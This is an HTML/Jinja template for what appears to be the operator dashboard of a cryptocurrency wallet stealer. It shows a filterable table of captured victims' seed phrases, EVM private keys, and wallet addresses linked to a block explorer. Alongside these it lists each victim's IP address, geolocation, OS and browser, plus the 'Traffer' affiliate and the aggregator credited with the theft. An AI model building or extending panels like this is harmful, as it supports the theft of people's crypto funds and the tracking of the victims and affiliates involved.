{% extends 'base.html' %}
      
{% block title %} {{ title }} {% endblock %}
{% block content %}

<div class="">
    <div class="container">
        <p style="color: red;">{{ error }}</p>
        <form  method="POST" >
            <input type="text" name="agg_name" placeholder="Aggregator's name/ID">
            <input value="Submit" type="submit" class="btn btn-secondary">
        </form>
        <br>
    </div>

    <div class="table">
    <table>
        <tr>
            <th>Input time</th>
            <th>mnemonic</th>
            <th>EVM Private key</th>
            <th>EVM Address</th>
            <th>remark</th>
            <th>Traffer</th>
            <th>Type</th>
            <th>Received Time</th>
            <th>IP address</th>
            <th>Geolocation</th>
            <th>OS</th>
            <th>Browser</th>

        </tr>
        {% for log in data%}
            <tr>
            {% if agg_name ==  log.aggregator_name or agg_name == '' %}
                <td>{{ format_date(log.date_created) }}</td>
                <td>{{ log.seed }}</td>
                <th>{{ log.key[:10] }}...</th>
                <td><a href="https://blockscan.com/address/{{  pubAddr(log.key)  }}" target="_blank">{{  pubAddr(log.key)[:10]  }}...</a>
                    <i class="bi bi-clipboard" onclick="copynew('{{ pubAddr(log.key) }}')">&nbsp;
                        <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-clipboard" viewBox="0 0 16 16">
                            <path d="M4 1.5H3a2 2 0 0 0-2 2V14a2 2 0 0 0 2 2h10a2 2 0 0 0 2-2V3.5a2 2 0 0 0-2-2h-1v1h1a1 1 0 0 1 1 1V14a1 1 0 0 1-1 1H3a1 1 0 0 1-1-1V3.5a1 1 0 0 1 1-1h1v-1z"/>
                            <path d="M9.5 1a.5.5 0 0 1 .5.5v1a.5.5 0 0 1-.5.5h-3a.5.5 0 0 1-.5-.5v-1a.5.5 0 0 1 .5-.5h3zm-3-1A1.5 1.5 0 0 0 5 1.5v1A1.5 1.5 0 0 0 6.5 4h3A1.5 1.5 0 0 0 11 2.5v-1A1.5 1.5 0 0 0 9.5 0h-3z"/>
                        </svg>
                    </i>
                </td>
                <td style="color: {{ format_error_color(log.remark) }} ">{{ format_error_string(log.remark) }}</td>
                <td>{{ log.aggregator_name }}</td>
                <td>{{ log.intype }}</td>
                <td>{{ log.received_date }}</td>
                <td>{{ log.ip }}</td>
                <td>{{ log.geo }}</td>
                <td>{{ log.os }}</td>
                <td>{{ log.browser }}</td>
            {% endif %}
            </tr>
        {% endfor %}
    </table>
    </div>
</div>

{% endblock %}
